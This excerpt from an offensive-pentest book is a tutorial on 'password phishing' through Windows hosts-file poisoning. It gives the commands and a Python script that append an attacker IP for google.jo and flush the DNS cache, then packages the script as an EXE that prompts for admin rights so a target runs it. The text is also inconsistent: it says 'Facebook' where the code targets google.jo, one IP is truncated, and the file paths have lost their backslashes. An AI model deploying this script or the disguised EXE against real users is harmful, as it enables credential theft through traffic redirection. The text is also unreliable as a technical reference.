Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details, and so on. Hackers or attackers lure customers to share their personal details by sending them e-mails which appear to come form popular organizatons. In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking.
In DNS poisoning, a corrupt Domain Name system data is injected into the DNS resolver’s cache. This causes the name server to provide an incorrect result record. Such a method can result into traffic being directed onto hacker’s computer system.
This article is an excerpt taken from ‘Python For Offensive PenTest written by Hussam Khrais.
Password phishing – DNS poisoning
One of the easiest ways to manipulate the direction of the traffic remotely is to play with DNS records. Each operating system contains a host file in order to statically map hostnames to specific IP addresses. The host file is a plain text file, which can be easily rewritten as long as we have admin privileges. For now, let’s have a quick look at the host file in the Windows operating system.
In Windows, the file will be located under C:WindowsSystem32driversetc. Let’s have a look at the contents of the host file:
If you read the description, you will see that each entry should be located on a separate line. Also, there is a sample of the record format, where the IP should be placed first. Then, after at least one space, the name follows. You will also see that each record’s IP address begins first and then we get the hostname.
Now, let’s see the traffic on the packet level:
- Open Wireshark on our target machine and start the capture.
- Filter on the attacker IP address:
We have an IP address of 10.10.10.100, which is the IP address of our attacker. We can see the traffic before poisoning the DNS records. You need to click on Apply to complete the process.
- Open https://www.google.jo/?gws_rd=ssl. Notice that once we ping the name from the command line, the operating system behind the scene will do a DNS lookup:
We will get the real IP address. Now, notice what happens after DNS poisoning. For this, close all the windows except the one where the Wireshark application is running.
- Now, even though we are running as an admin, when it comes to running an application you should explicitly do a right-click and then run as admin.
- Navigate to the directory where the hosts file is located.
- Execute dir and you will get the hosts file.
- Run type hosts. You can see the original host here.
- Now, we will enter the command:
echo 10.10.10.100 www.google.jo >> hosts
10.10.100, is the IP address of our Kali machine. So, once the target goes to google.jo, it should be redirected to the attacker machine.
- Once again verify the host by executing type hosts.
- Now, after doing a DNS modification, it’s always a good thing to flush the DNS cache, just to make sure that we will use the updated record. For this, enter the following command:
ipconfig /flushdns
- Now, watch what happens after DNS poisoning. For this, we will open our browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that on Wireshark the traffic is going to the Kali IP address instead of the real IP address of google.jo. This is because the DNS resolution for google.jo was 10.10.10.100.
- We will stop the capturing and recover the original hosts file. We will then place that file in the driversetc folder.
- Now, let’s flush the poisoned DNS cache first by running:
ipconfig /flushdns
- Then, open the browser again. We should go to https://www.google.jo/?gws_rd=ssl right now. Now we are good to go!
Using Python script
Now we’ll automate the steps, but this time via a Python script.
Open the script and enter the following code:
# Python For Offensive PenTest
# DNS_Poisoning
import subprocess
import os
os.chdir("C:WindowsSystem32driversetc") # change the script directory to ..etc where the host file is located on windows
command = "echo 10.10.10.100 www.google.jo >> hosts" # Append this line to the host file, where it should redirect
# traffic going to google.jo to IP of 10.10.10.100
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
command = "ipconfig /flushdns" # flush the cached dns, to make sure that new sessions will take the new DNS record
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
The first thing we will do is change our current working directory to be the same as the hosts file, and that will be done using the OS library. Then, using subprocesses, we will append a static DNS record, pointing Facebook to 10.10.10.100: the Kali IP address. In the last step, we will flush the DNS record. We can now save the file and export the script into EXE.
Remember that we need to make the target execute it as admin. To do that, in the setup file for the py2exe, we will add a new line, as follows:
... windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}], ...
So, we have added a new option, specifying that when the target executes the EXE file, we will ask to elevate our privilege into admin. To do this, we will require administrator privileges.
Let’s run the setup file and start a new capture. Now, I will copy our EXE file onto the desktop. Notice here that we got a little shield indicating that this file needs an admin privilege, which will give us the exact result for running as admin. Now, let’s run the file. Verify that the file host gets modified. You will see that our line has been added.
Now, open a new session and we will see whether we got the redirection. So, let’s start a new capture, and we will add on the Firefox. As you will see, the DNS lookup for google.jo is pointing to our IP address, which is 10.10.10.100.
We learned how to carry out password phishing using DNS poisoning. If you’ve enjoyed reading the post, do check out, Python For Offensive PenTest to learn how to hack passwords and perform a privilege escalation on Windows with practical examples.